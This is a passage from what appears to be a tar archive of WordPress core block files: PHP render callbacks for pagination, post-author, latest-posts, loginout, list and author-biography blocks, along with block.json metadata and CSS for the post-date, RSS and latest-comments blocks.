	$max_page            = isset( $block->context['query']['pages'] ) ? (int) $block->context['query']['pages'] : 0;

	$wrapper_attributes = get_block_wrapper_attributes();
	$content            = '';
	global $wp_query;
	$mid_size = isset( $block->attributes['midSize'] ) ? (int) $block->attributes['midSize'] : null;
	if ( isset( $block->context['query']['inherit'] ) && $block->context['query']['inherit'] ) {
		// Take into account if we have set a bigger `max page`
		// than what the query has.
		$total         = ! $max_page || $max_page > $wp_query->max_num_pages ? $wp_query->max_num_pages : $max_page;
		$paginate_args = array(
			'prev_next' => false,
			'total'     => $total,
		);
		if ( null !== $mid_size ) {
			$paginate_args['mid_size'] = $mid_size;
		}
		$content = paginate_links( $paginate_args );
	} else {
		$block_query = new WP_Query( build_query_vars_from_query_block( $block, $page ) );
		// `paginate_links` works with the global $wp_query, so we have to
		// temporarily switch it with our custom query.
		$prev_wp_query = $wp_query;
		$wp_query      = $block_query;
		$total         = ! $max_page || $max_page > $wp_query->max_num_pages ? $wp_query->max_num_pages : $max_page;
		$paginate_args = array(
			'base'      => '%_%',
			'format'    => "?$page_key=%#%",
			'current'   => max( 1, $page ),
			'total'     => $total,
			'prev_next' => false,
		);
		if ( null !== $mid_size ) {
			$paginate_args['mid_size'] = $mid_size;
		}
		if ( 1 !== $page ) {
			/**
			 * `paginate_links` doesn't use the provided `format` when the page is `1`.
			 * This is great for the main query as it removes the extra query params
			 * making the URL shorter, but in the case of multiple custom queries is
			 * problematic. It results in returning an empty link which ends up with
			 * a link to the current page.
			 *
			 * A way to address this is to add a `fake` query arg with no value that
			 * is the same for all custom queries. This way the link is not empty and
			 * preserves all the other existent query args.
			 *
			 * @see https://developer.wordpress.org/reference/functions/paginate_links/
			 *
			 * The proper fix of this should be in core. Track Ticket:
			 * @see https://core.trac.wordpress.org/ticket/53868
			 *
			 * TODO: After two WP versions (starting from the WP version the core patch landed),
			 * we should remove this and call `paginate_links` with the proper new arg.
			 */
			$paginate_args['add_args'] = array( 'cst' => '' );
		}
		// We still need to preserve `paged` query param if exists, as is used
		// for Queries that inherit from global context.
		$paged = empty( $_GET['paged'] ) ? null : (int) $_GET['paged'];
		if ( $paged ) {
			$paginate_args['add_args'] = array( 'paged' => $paged );
		}
		$content = paginate_links( $paginate_args );
		wp_reset_postdata(); // Restore original Post Data.
		$wp_query = $prev_wp_query;
	}

	if ( empty( $content ) ) {
		return '';
	}

	if ( $enhanced_pagination ) {
		$p         = new WP_HTML_Tag_Processor( $content );
		$tag_index = 0;
		while ( $p->next_tag(
			array( 'class_name' => 'page-numbers' )
		) ) {
			if ( null === $p->get_attribute( 'data-wp-key' ) ) {
				$p->set_attribute( 'data-wp-key', 'index-' . $tag_index++ );
			}
			if ( 'A' === $p->get_tag() ) {
				$p->set_attribute( 'data-wp-on--click', 'core/query::actions.navigate' );
			}
		}
		$content = $p->get_updated_html();
	}

	return sprintf(
		'<div %1$s>%2$s</div>',
		$wrapper_attributes,
		$content
	);
}

/**
 * Registers the `core/query-pagination-numbers` block on the server.
 *
 * @since 5.8.0
 */
function register_block_core_query_pagination_numbers() {
	register_block_type_from_metadata(
		__DIR__ . '/query-pagination-numbers',
		array(
			'render_callback' => 'render_block_core_query_pagination_numbers',
		)
	);
}
add_action( 'init', 'register_block_core_query_pagination_numbers' );
post-author.php000060400000005055151330427370007550 0ustar00<?php
/**
 * Server-side rendering of the `core/post-author` block.
 *
 * @package WordPress
 */

/**
 * Renders the `core/post-author` block on the server.
 *
 * @since 5.9.0
 *
 * @param  array    $attributes Block attributes.
 * @param  string   $content    Block default content.
 * @param  WP_Block $block      Block instance.
 * @return string Returns the rendered author block.
 */
function render_block_core_post_author( $attributes, $content, $block ) {
	if ( ! isset( $block->context['postId'] ) ) {
		$author_id = get_query_var( 'author' );
	} else {
		$author_id = get_post_field( 'post_author', $block->context['postId'] );
	}

	if ( empty( $author_id ) ) {
		return '';
	}

	$avatar = ! empty( $attributes['avatarSize'] ) ? get_avatar(
		$author_id,
		$attributes['avatarSize']
	) : null;

	$link        = get_author_posts_url( $author_id );
	$author_name = get_the_author_meta( 'display_name', $author_id );
	if ( ! empty( $attributes['isLink'] && ! empty( $attributes['linkTarget'] ) ) ) {
		$author_name = sprintf( '<a href="%1$s" target="%2$s">%3$s</a>', esc_url( $link ), esc_attr( $attributes['linkTarget'] ), $author_name );
	}

	$byline  = ! empty( $attributes['byline'] ) ? $attributes['byline'] : false;
	$classes = array();
	if ( isset( $attributes['itemsJustification'] ) ) {
		$classes[] = 'items-justified-' . $attributes['itemsJustification'];
	}
	if ( isset( $attributes['textAlign'] ) ) {
		$classes[] = 'has-text-align-' . $attributes['textAlign'];
	}
	if ( isset( $attributes['style']['elements']['link']['color']['text'] ) ) {
		$classes[] = 'has-link-color';
	}

	$wrapper_attributes = get_block_wrapper_attributes( array( 'class' => implode( ' ', $classes ) ) );

	return sprintf( '<div %1$s>', $wrapper_attributes ) .
	( ! empty( $attributes['showAvatar'] ) ? '<div class="wp-block-post-author__avatar">' . $avatar . '</div>' : '' ) .
	'<div class="wp-block-post-author__content">' .
	( ! empty( $byline ) ? '<p class="wp-block-post-author__byline">' . wp_kses_post( $byline ) . '</p>' : '' ) .
	'<p class="wp-block-post-author__name">' . $author_name . '</p>' .
	( ! empty( $attributes['showBio'] ) ? '<p class="wp-block-post-author__bio">' . get_the_author_meta( 'user_description', $author_id ) . '</p>' : '' ) .
	'</div>' .
	'</div>';
}

/**
 * Registers the `core/post-author` block on the server.
 *
 * @since 5.9.0
 */
function register_block_core_post_author() {
	register_block_type_from_metadata(
		__DIR__ . '/post-author',
		array(
			'render_callback' => 'render_block_core_post_author',
		)
	);
}
add_action( 'init', 'register_block_core_post_author' );
latest-posts.php000060400000020546151330427370007727 0ustar00<?php
/**
 * Server-side rendering of the `core/latest-posts` block.
 *
 * @package WordPress
 */

/**
 * The excerpt length set by the Latest Posts core block
 * set at render time and used by the block itself.
 *
 * @var int
 */
global $block_core_latest_posts_excerpt_length;
$block_core_latest_posts_excerpt_length = 0;

/**
 * Callback for the excerpt_length filter used by
 * the Latest Posts block at render time.
 *
 * @since 5.4.0
 *
 * @return int Returns the global $block_core_latest_posts_excerpt_length variable
 *             to allow the excerpt_length filter respect the Latest Block setting.
 */
function block_core_latest_posts_get_excerpt_length() {
	global $block_core_latest_posts_excerpt_length;
	return $block_core_latest_posts_excerpt_length;
}

/**
 * Renders the `core/latest-posts` block on server.
 *
 * @since 5.0.0
 *
 * @param array $attributes The block attributes.
 *
 * @return string Returns the post content with latest posts added.
 */
function render_block_core_latest_posts( $attributes ) {
	global $post, $block_core_latest_posts_excerpt_length;

	$args = array(
		'posts_per_page'      => $attributes['postsToShow'],
		'post_status'         => 'publish',
		'order'               => $attributes['order'],
		'orderby'             => $attributes['orderBy'],
		'ignore_sticky_posts' => true,
		'no_found_rows'       => true,
	);

	$block_core_latest_posts_excerpt_length = $attributes['excerptLength'];
	add_filter( 'excerpt_length', 'block_core_latest_posts_get_excerpt_length', 20 );

	if ( ! empty( $attributes['categories'] ) ) {
		$args['category__in'] = array_column( $attributes['categories'], 'id' );
	}
	if ( isset( $attributes['selectedAuthor'] ) ) {
		$args['author'] = $attributes['selectedAuthor'];
	}

	$query        = new WP_Query();
	$recent_posts = $query->query( $args );

	if ( isset( $attributes['displayFeaturedImage'] ) && $attributes['displayFeaturedImage'] ) {
		update_post_thumbnail_cache( $query );
	}

	$list_items_markup = '';

	foreach ( $recent_posts as $post ) {
		$post_link = esc_url( get_permalink( $post ) );
		$title     = get_the_title( $post );

		if ( ! $title ) {
			$title = __( '(no title)' );
		}

		$list_items_markup .= '<li>';

		if ( $attributes['displayFeaturedImage'] && has_post_thumbnail( $post ) ) {
			$image_style = '';
			if ( isset( $attributes['featuredImageSizeWidth'] ) ) {
				$image_style .= sprintf( 'max-width:%spx;', $attributes['featuredImageSizeWidth'] );
			}
			if ( isset( $attributes['featuredImageSizeHeight'] ) ) {
				$image_style .= sprintf( 'max-height:%spx;', $attributes['featuredImageSizeHeight'] );
			}

			$image_classes = 'wp-block-latest-posts__featured-image';
			if ( isset( $attributes['featuredImageAlign'] ) ) {
				$image_classes .= ' align' . $attributes['featuredImageAlign'];
			}

			$featured_image = get_the_post_thumbnail(
				$post,
				$attributes['featuredImageSizeSlug'],
				array(
					'style' => esc_attr( $image_style ),
				)
			);
			if ( $attributes['addLinkToFeaturedImage'] ) {
				$featured_image = sprintf(
					'<a href="%1$s" aria-label="%2$s">%3$s</a>',
					esc_url( $post_link ),
					esc_attr( $title ),
					$featured_image
				);
			}
			$list_items_markup .= sprintf(
				'<div class="%1$s">%2$s</div>',
				esc_attr( $image_classes ),
				$featured_image
			);
		}

		$list_items_markup .= sprintf(
			'<a class="wp-block-latest-posts__post-title" href="%1$s">%2$s</a>',
			esc_url( $post_link ),
			$title
		);

		if ( isset( $attributes['displayAuthor'] ) && $attributes['displayAuthor'] ) {
			$author_display_name = get_the_author_meta( 'display_name', $post->post_author );

			/* translators: byline. %s: current author. */
			$byline = sprintf( __( 'by %s' ), $author_display_name );

			if ( ! empty( $author_display_name ) ) {
				$list_items_markup .= sprintf(
					'<div class="wp-block-latest-posts__post-author">%1$s</div>',
					$byline
				);
			}
		}

		if ( isset( $attributes['displayPostDate'] ) && $attributes['displayPostDate'] ) {
			$list_items_markup .= sprintf(
				'<time datetime="%1$s" class="wp-block-latest-posts__post-date">%2$s</time>',
				esc_attr( get_the_date( 'c', $post ) ),
				get_the_date( '', $post )
			);
		}

		if ( isset( $attributes['displayPostContent'] ) && $attributes['displayPostContent']
			&& isset( $attributes['displayPostContentRadio'] ) && 'excerpt' === $attributes['displayPostContentRadio'] ) {

			$trimmed_excerpt = get_the_excerpt( $post );

			/*
			 * Adds a "Read more" link with screen reader text.
			 * [&hellip;] is the default excerpt ending from wp_trim_excerpt() in Core.
			 */
			if ( str_ends_with( $trimmed_excerpt, ' [&hellip;]' ) ) {
				/** This filter is documented in wp-includes/formatting.php */
				$excerpt_length = (int) apply_filters( 'excerpt_length', $block_core_latest_posts_excerpt_length );
				if ( $excerpt_length <= $block_core_latest_posts_excerpt_length ) {
					$trimmed_excerpt  = substr( $trimmed_excerpt, 0, -11 );
					$trimmed_excerpt .= sprintf(
						/* translators: 1: A URL to a post, 2: Hidden accessibility text: Post title */
						__( '… <a class="wp-block-latest-posts__read-more" href="%1$s" rel="noopener noreferrer">Read more<span class="screen-reader-text">: %2$s</span></a>' ),
						esc_url( $post_link ),
						esc_html( $title )
					);
				}
			}

			if ( post_password_required( $post ) ) {
				$trimmed_excerpt = __( 'This content is password protected.' );
			}

			$list_items_markup .= sprintf(
				'<div class="wp-block-latest-posts__post-excerpt">%1$s</div>',
				$trimmed_excerpt
			);
		}

		if ( isset( $attributes['displayPostContent'] ) && $attributes['displayPostContent']
			&& isset( $attributes['displayPostContentRadio'] ) && 'full_post' === $attributes['displayPostContentRadio'] ) {

			$post_content = html_entity_decode( $post->post_content, ENT_QUOTES, get_option( 'blog_charset' ) );

			if ( post_password_required( $post ) ) {
				$post_content = __( 'This content is password protected.' );
			}

			$list_items_markup .= sprintf(
				'<div class="wp-block-latest-posts__post-full-content">%1$s</div>',
				wp_kses_post( $post_content )
			);
		}

		$list_items_markup .= "</li>\n";
	}

	remove_filter( 'excerpt_length', 'block_core_latest_posts_get_excerpt_length', 20 );

	$classes = array( 'wp-block-latest-posts__list' );
	if ( isset( $attributes['postLayout'] ) && 'grid' === $attributes['postLayout'] ) {
		$classes[] = 'is-grid';
	}
	if ( isset( $attributes['columns'] ) && 'grid' === $attributes['postLayout'] ) {
		$classes[] = 'columns-' . $attributes['columns'];
	}
	if ( isset( $attributes['displayPostDate'] ) && $attributes['displayPostDate'] ) {
		$classes[] = 'has-dates';
	}
	if ( isset( $attributes['displayAuthor'] ) && $attributes['displayAuthor'] ) {
		$classes[] = 'has-author';
	}
	if ( isset( $attributes['style']['elements']['link']['color']['text'] ) ) {
		$classes[] = 'has-link-color';
	}

	$wrapper_attributes = get_block_wrapper_attributes( array( 'class' => implode( ' ', $classes ) ) );

	return sprintf(
		'<ul %1$s>%2$s</ul>',
		$wrapper_attributes,
		$list_items_markup
	);
}

/**
 * Registers the `core/latest-posts` block on server.
 *
 * @since 5.0.0
 */
function register_block_core_latest_posts() {
	register_block_type_from_metadata(
		__DIR__ . '/latest-posts',
		array(
			'render_callback' => 'render_block_core_latest_posts',
		)
	);
}
add_action( 'init', 'register_block_core_latest_posts' );

/**
 * Handles outdated versions of the `core/latest-posts` block by converting
 * attribute `categories` from a numeric string to an array with key `id`.
 *
 * This is done to accommodate the changes introduced in #20781 that sought to
 * add support for multiple categories to the block. However, given that this
 * block is dynamic, the usual provisions for block migration are insufficient,
 * as they only act when a block is loaded in the editor.
 *
 * TODO: Remove when and if the bottom client-side deprecation for this block
 * is removed.
 *
 * @since 5.5.0
 *
 * @param array $block A single parsed block object.
 *
 * @return array The migrated block object.
 */
function block_core_latest_posts_migrate_categories( $block ) {
	if (
		'core/latest-posts' === $block['blockName'] &&
		! empty( $block['attrs']['categories'] ) &&
		is_string( $block['attrs']['categories'] )
	) {
		$block['attrs']['categories'] = array(
			array( 'id' => absint( $block['attrs']['categories'] ) ),
		);
	}

	return $block;
}
add_filter( 'render_block_data', 'block_core_latest_posts_migrate_categories' );
post-date/style-rtl.min.css000060400000000052151330427370011675 0ustar00.wp-block-post-date{box-sizing:border-box}post-date/style-rtl.css000060400000000057151330427370011120 0ustar00.wp-block-post-date{
  box-sizing:border-box;
}post-date/style.css000060400000000057151330427370010321 0ustar00.wp-block-post-date{
  box-sizing:border-box;
}post-date/block.json000060400000002257151330427370010440 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/post-date",
	"title": "Date",
	"category": "theme",
	"description": "Display the publish date for an entry such as a post or page.",
	"textdomain": "default",
	"attributes": {
		"textAlign": {
			"type": "string"
		},
		"format": {
			"type": "string"
		},
		"isLink": {
			"type": "boolean",
			"default": false
		},
		"displayType": {
			"type": "string",
			"default": "date"
		}
	},
	"usesContext": [ "postId", "postType", "queryId" ],
	"supports": {
		"html": false,
		"color": {
			"gradients": true,
			"link": true,
			"__experimentalDefaultControls": {
				"background": true,
				"text": true,
				"link": true
			}
		},
		"spacing": {
			"margin": true,
			"padding": true
		},
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalFontWeight": true,
			"__experimentalFontStyle": true,
			"__experimentalTextTransform": true,
			"__experimentalTextDecoration": true,
			"__experimentalLetterSpacing": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		},
		"interactivity": {
			"clientNavigation": true
		}
	}
}
post-date/style.min.css000060400000000052151330427370011076 0ustar00.wp-block-post-date{box-sizing:border-box}loginout.php000060400000002612151330427370007117 0ustar00<?php
/**
 * Server-side rendering of the `core/loginout` block.
 *
 * @package WordPress
 */

/**
 * Renders the `core/loginout` block on server.
 *
 * @since 5.8.0
 *
 * @param array $attributes The block attributes.
 *
 * @return string Returns the login-out link or form.
 */
function render_block_core_loginout( $attributes ) {

	// Build the redirect URL.
	$current_url = ( is_ssl() ? 'https://' : 'http://' ) . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];

	$classes  = is_user_logged_in() ? 'logged-in' : 'logged-out';
	$contents = wp_loginout(
		isset( $attributes['redirectToCurrent'] ) && $attributes['redirectToCurrent'] ? $current_url : '',
		false
	);

	// If logged-out and displayLoginAsForm is true, show the login form.
	if ( ! is_user_logged_in() && ! empty( $attributes['displayLoginAsForm'] ) ) {
		// Add a class.
		$classes .= ' has-login-form';

		// Get the form.
		$contents = wp_login_form( array( 'echo' => false ) );
	}

	$wrapper_attributes = get_block_wrapper_attributes( array( 'class' => $classes ) );

	return '<div ' . $wrapper_attributes . '>' . $contents . '</div>';
}

/**
 * Registers the `core/loginout` block on server.
 *
 * @since 5.8.0
 */
function register_block_core_loginout() {
	register_block_type_from_metadata(
		__DIR__ . '/loginout',
		array(
			'render_callback' => 'render_block_core_loginout',
		)
	);
}
add_action( 'init', 'register_block_core_loginout' );
list.php000060400000002371151330427370006234 0ustar00<?php
/**
 * Adds the wp-block-list class to the rendered list block.
 *
 * @package WordPress
 */

/**
 * Adds the wp-block-list class to the rendered list block.
 * Ensures that pre-existing list blocks use the class name on the front.
 * For example, <ol> is transformed to <ol class="wp-block-list">.
 *
 * @since 6.6.0
 *
 * @see https://github.com/WordPress/gutenberg/issues/12420
 *
 * @param array  $attributes Attributes of the block being rendered.
 * @param string $content Content of the block being rendered.
 *
 * @return string The content of the block being rendered.
 */
function block_core_list_render( $attributes, $content ) {
	if ( ! $content ) {
		return $content;
	}

	$processor = new WP_HTML_Tag_Processor( $content );

	$list_tags = array( 'OL', 'UL' );
	while ( $processor->next_tag() ) {
		if ( in_array( $processor->get_tag(), $list_tags, true ) ) {
			$processor->add_class( 'wp-block-list' );
			break;
		}
	}

	return $processor->get_updated_html();
}

/**
 * Registers the `core/list` block on server.
 *
 * @since 6.6.0
 */
function register_block_core_list() {
	register_block_type_from_metadata(
		__DIR__ . '/list',
		array(
			'render_callback' => 'block_core_list_render',
		)
	);
}

add_action( 'init', 'register_block_core_list' );
post-author-biography.php000060400000002764151330427370011536 0ustar00<?php
/**
 * Server-side rendering of the `core/post-author-biography` block.
 *
 * @package WordPress
 */

/**
 * Renders the `core/post-author-biography` block on the server.
 *
 * @since 6.0.0
 *
 * @param  array    $attributes Block attributes.
 * @param  string   $content    Block default content.
 * @param  WP_Block $block      Block instance.
 * @return string Returns the rendered post author biography block.
 */
function render_block_core_post_author_biography( $attributes, $content, $block ) {
	if ( isset( $block->context['postId'] ) ) {
		$author_id = get_post_field( 'post_author', $block->context['postId'] );
	} else {
		$author_id = get_query_var( 'author' );
	}

	if ( empty( $author_id ) ) {
		return '';
	}

	$author_biography = get_the_author_meta( 'description', $author_id );
	if ( empty( $author_biography ) ) {
		return '';
	}

	$align_class_name   = empty( $attributes['textAlign'] ) ? '' : "has-text-align-{$attributes['textAlign']}";
	$wrapper_attributes = get_block_wrapper_attributes( array( 'class' => $align_class_name ) );

	return sprintf( '<div %1$s>', $wrapper_attributes ) . $author_biography . '</div>';
}

/**
 * Registers the `core/post-author-biography` block on the server.
 *
 * @since 6.0.0
 */
function register_block_core_post_author_biography() {
	register_block_type_from_metadata(
		__DIR__ . '/post-author-biography',
		array(
			'render_callback' => 'render_block_core_post_author_biography',
		)
	);
}
add_action( 'init', 'register_block_core_post_author_biography' );
rss/editor-rtl.min.css000060400000000165151330427370010737 0ustar00.wp-block-rss li a>div{display:inline}.wp-block-rss__placeholder-form .wp-block-rss__placeholder-input{flex:1 1 auto}rss/editor.css000060400000000201151330427370007345 0ustar00.wp-block-rss li a>div{
  display:inline;
}

.wp-block-rss__placeholder-form .wp-block-rss__placeholder-input{
  flex:1 1 auto;
}rss/style.min.css000060400000001273151330427370010013 0ustar00ul.wp-block-rss{list-style:none;padding:0}ul.wp-block-rss.wp-block-rss{box-sizing:border-box}ul.wp-block-rss.alignleft{margin-right:2em}ul.wp-block-rss.alignright{margin-left:2em}ul.wp-block-rss.is-grid{display:flex;flex-wrap:wrap;list-style:none;padding:0}ul.wp-block-rss.is-grid li{margin:0 1em 1em 0;width:100%}@media (min-width:600px){ul.wp-block-rss.columns-2 li{width:calc(50% - 1em)}ul.wp-block-rss.columns-3 li{width:calc(33.33333% - 1em)}ul.wp-block-rss.columns-4 li{width:calc(25% - 1em)}ul.wp-block-rss.columns-5 li{width:calc(20% - 1em)}ul.wp-block-rss.columns-6 li{width:calc(16.66667% - 1em)}}.wp-block-rss__item-author,.wp-block-rss__item-publish-date{display:block;font-size:.8125em}rss/editor-rtl.css000060400000000201151330427370010144 0ustar00.wp-block-rss li a>div{
  display:inline;
}

.wp-block-rss__placeholder-form .wp-block-rss__placeholder-input{
  flex:1 1 auto;
}rss/style-rtl.min.css000060400000001273151330427370010612 0ustar00ul.wp-block-rss{list-style:none;padding:0}ul.wp-block-rss.wp-block-rss{box-sizing:border-box}ul.wp-block-rss.alignleft{margin-right:2em}ul.wp-block-rss.alignright{margin-left:2em}ul.wp-block-rss.is-grid{display:flex;flex-wrap:wrap;list-style:none;padding:0}ul.wp-block-rss.is-grid li{margin:0 0 1em 1em;width:100%}@media (min-width:600px){ul.wp-block-rss.columns-2 li{width:calc(50% - 1em)}ul.wp-block-rss.columns-3 li{width:calc(33.33333% - 1em)}ul.wp-block-rss.columns-4 li{width:calc(25% - 1em)}ul.wp-block-rss.columns-5 li{width:calc(20% - 1em)}ul.wp-block-rss.columns-6 li{width:calc(16.66667% - 1em)}}.wp-block-rss__item-author,.wp-block-rss__item-publish-date{display:block;font-size:.8125em}rss/block.json000060400000001677151330427370007354 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/rss",
	"title": "RSS",
	"category": "widgets",
	"description": "Display entries from any RSS or Atom feed.",
	"keywords": [ "atom", "feed" ],
	"textdomain": "default",
	"attributes": {
		"columns": {
			"type": "number",
			"default": 2
		},
		"blockLayout": {
			"type": "string",
			"default": "list"
		},
		"feedURL": {
			"type": "string",
			"default": ""
		},
		"itemsToShow": {
			"type": "number",
			"default": 5
		},
		"displayExcerpt": {
			"type": "boolean",
			"default": false
		},
		"displayAuthor": {
			"type": "boolean",
			"default": false
		},
		"displayDate": {
			"type": "boolean",
			"default": false
		},
		"excerptLength": {
			"type": "number",
			"default": 55
		}
	},
	"supports": {
		"align": true,
		"html": false,
		"interactivity": {
			"clientNavigation": true
		}
	},
	"editorStyle": "wp-block-rss-editor",
	"style": "wp-block-rss"
}
rss/editor.min.css000060400000000165151330427370010140 0ustar00.wp-block-rss li a>div{display:inline}.wp-block-rss__placeholder-form .wp-block-rss__placeholder-input{flex:1 1 auto}rss/style-rtl.css000060400000001465151330427370010033 0ustar00ul.wp-block-rss{
  list-style:none;
  padding:0;
}
ul.wp-block-rss.wp-block-rss{
  box-sizing:border-box;
}
ul.wp-block-rss.alignleft{
  margin-right:2em;
}
ul.wp-block-rss.alignright{
  margin-left:2em;
}
ul.wp-block-rss.is-grid{
  display:flex;
  flex-wrap:wrap;
  list-style:none;
  padding:0;
}
ul.wp-block-rss.is-grid li{
  margin:0 0 1em 1em;
  width:100%;
}
@media (min-width:600px){
  ul.wp-block-rss.columns-2 li{
    width:calc(50% - 1em);
  }
  ul.wp-block-rss.columns-3 li{
    width:calc(33.33333% - 1em);
  }
  ul.wp-block-rss.columns-4 li{
    width:calc(25% - 1em);
  }
  ul.wp-block-rss.columns-5 li{
    width:calc(20% - 1em);
  }
  ul.wp-block-rss.columns-6 li{
    width:calc(16.66667% - 1em);
  }
}

.wp-block-rss__item-author,.wp-block-rss__item-publish-date{
  display:block;
  font-size:.8125em;
}rss/style.css000060400000001465151330427370007234 0ustar00ul.wp-block-rss{
  list-style:none;
  padding:0;
}
ul.wp-block-rss.wp-block-rss{
  box-sizing:border-box;
}
ul.wp-block-rss.alignleft{
  margin-right:2em;
}
ul.wp-block-rss.alignright{
  margin-left:2em;
}
ul.wp-block-rss.is-grid{
  display:flex;
  flex-wrap:wrap;
  list-style:none;
  padding:0;
}
ul.wp-block-rss.is-grid li{
  margin:0 1em 1em 0;
  width:100%;
}
@media (min-width:600px){
  ul.wp-block-rss.columns-2 li{
    width:calc(50% - 1em);
  }
  ul.wp-block-rss.columns-3 li{
    width:calc(33.33333% - 1em);
  }
  ul.wp-block-rss.columns-4 li{
    width:calc(25% - 1em);
  }
  ul.wp-block-rss.columns-5 li{
    width:calc(20% - 1em);
  }
  ul.wp-block-rss.columns-6 li{
    width:calc(16.66667% - 1em);
  }
}

.wp-block-rss__item-author,.wp-block-rss__item-publish-date{
  display:block;
  font-size:.8125em;
}latest-comments/block.json000060400000002307151330427370011653 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/latest-comments",
	"title": "Latest Comments",
	"category": "widgets",
	"description": "Display a list of your most recent comments.",
	"keywords": [ "recent comments" ],
	"textdomain": "default",
	"attributes": {
		"commentsToShow": {
			"type": "number",
			"default": 5,
			"minimum": 1,
			"maximum": 100
		},
		"displayAvatar": {
			"type": "boolean",
			"default": true
		},
		"displayDate": {
			"type": "boolean",
			"default": true
		},
		"displayExcerpt": {
			"type": "boolean",
			"default": true
		}
	},
	"supports": {
		"align": true,
		"html": false,
		"spacing": {
			"margin": true,
			"padding": true
		},
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalFontWeight": true,
			"__experimentalFontStyle": true,
			"__experimentalTextTransform": true,
			"__experimentalTextDecoration": true,
			"__experimentalLetterSpacing": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		},
		"interactivity": {
			"clientNavigation": true
		}
	},
	"editorStyle": "wp-block-latest-comments-editor",
	"style": "wp-block-latest-comments"
}
latest-comments/style.min.css000060400000002426151330427370012324 0ustar00ol.wp-block-latest-comments{box-sizing:border-box;margin-left:0}:where(.wp-block-latest-comments:not([style*=line-height] .wp-block-latest-comments__comment)){line-height:1.1}:where(.wp-block-latest-comments:not([style*=line-height] .wp-block-latest-comments__comment-excerpt p)){line-height:1.8}.has-dates :where(.wp-block-latest-comments:not([style*=line-height])),.has-excerpts :where(.wp-block-latest-comments:not([style*=line-height])){line-height:1.5}.wp-block-latest-comments .wp-block-latest-comments{padding-left:0}.wp-block-latest-comments__comment{list-style:none;margin-bottom:1em}.has-avatars .wp-block-latest-comments__comment{list-style:none;min-height:2.25em}.has-avatars .wp-block-latest-comments__comment .wp-block-latest-comments__comment-excerpt,.has-avatars .wp-block-latest-comments__comment .wp-block-latest-comments__comment-meta{margin-left:3.25em}.wp-block-latest-comments__comment-excerpt p{font-size:.875em;margin:.36em 0 1.4em}.wp-block-latest-comments__comment-date{display:block;font-size:.75em}.wp-block-latest-comments .avatar,.wp-block-latest-comments__comment-avatar{border-radius:1.5em;display:block;float:left;height:2.5em;margin-right:.75em;width:2.5em}.wp-block-latest-comments[class*=-font-size] a,.wp-block-latest-comments[style*=font-size] a{font-size:inherit}latest-comments/style.css000060400000002604151330427370011540 0ustar00ol.wp-block-latest-comments{
  box-sizing:border-box;
  margin-left:0;
}

:where(.wp-block-latest-comments:not([style*=line-height] .wp-block-latest-comments__comment)){
  line-height:1.1;
}

:where(.wp-block-latest-comments:not([style*=line-height] .wp-block-latest-comments__comment-excerpt p)){
  line-height:1.8;
}

.has-dates :where(.wp-block-latest-comments:not([style*=line-height])),.has-excerpts :where(.wp-block-latest-comments:not([style*=line-height])){
  line-height:1.5;
}

.wp-block-latest-comments .wp-block-latest-comments{
  padding-left:0;
}

.wp-block-latest-comments__comment{
  list-style:none;
  margin-bottom:1em;
}
.has-avatars .wp-block-latest-comments__comment{
  list-style:none;
  min-height:2.25em;
}
.has-avatars .wp-block-latest-comments__comment .wp-block-latest-comments__comment-excerpt,.has-avatars .wp-block-latest-comments__comment .wp-block-latest-comments__comment-meta{
  margin-left:3.25em;
}

.wp-block-latest-comments__comment-excerpt p{
  font-size:.875em;
  margin:.36em 0 1.4em;
}

.wp-block-latest-comments__comment-date{
  display:block;
  font-size:.75em;
}

.wp-block-latest-comments .avatar,.wp-block-latest-comments__comment-avatar{
  border-radius:1.5em;
  display:block;
  float:left;
  height:2.5em;
  margin-right:.75em;
  width:2.5em;
}

.wp-block-latest-comments[class*=-font-size] a,.wp-block-latest-comments[style*=font-size] a{
  font-size:inherit;
}latest-comments/style-rtl.css000060400000002607151330427370012342 0ustar00ol.wp-block-latest-comments{
  box-sizing:border-box;
  margin-right:0;
}

:where(.wp-block-latest-comments:not([style*=line-height] .wp-block-latest-comments__comment)){
  line-height:1.1;
}

:where(.wp-block-latest-comments:not([style*=line-height] .wp-block-latest-comments__comment-excerpt p)){
  line-height:1.8;
}

.has-dates :where(.wp-block-latest-comments:not([style*=line-height])),.has-excerpts :where(.wp-block-latest-comments:not([style*=line-height])){
  line-height:1.5;
}

.wp-block-latest-comments .wp-block-latest-comments{
  padding-right:0;
}

.wp-block-latest-comments__comment{
  list-style:none;
  margin-bottom:1em;
}
.has-avatars .wp-block-latest-comments__comment{
  list-style:none;
  min-height:2.25em;
}
.has-avatars .wp-block-latest-comments__comment .wp-block-latest-comments__comment-excerpt,.has-avatars .wp-block-latest-comments__comment .wp-block-latest-comments__comment-meta{
  margin-right:3.25em;
}

.wp-block-latest-comments__comment-excerpt p{
  font-size:.875em;
  margin:.36em 0 1.4em;
}

.wp-block-latest-comments__comment-date{
  display:block;
  font-size:.75em;
}

.wp-block-latest-comments .avatar,.wp-block-latest-comments__comment-avatar{
  border-radius:1.5em;
  display:block;
  float:right;
  height:2.5em;
  margin-left:.75em;
  width:2.5em;
}

.wp-block-latest-comments[class*=-font-size] a,.wp-block-latest-comments[style*=font-size] a{
  font-size:inherit;
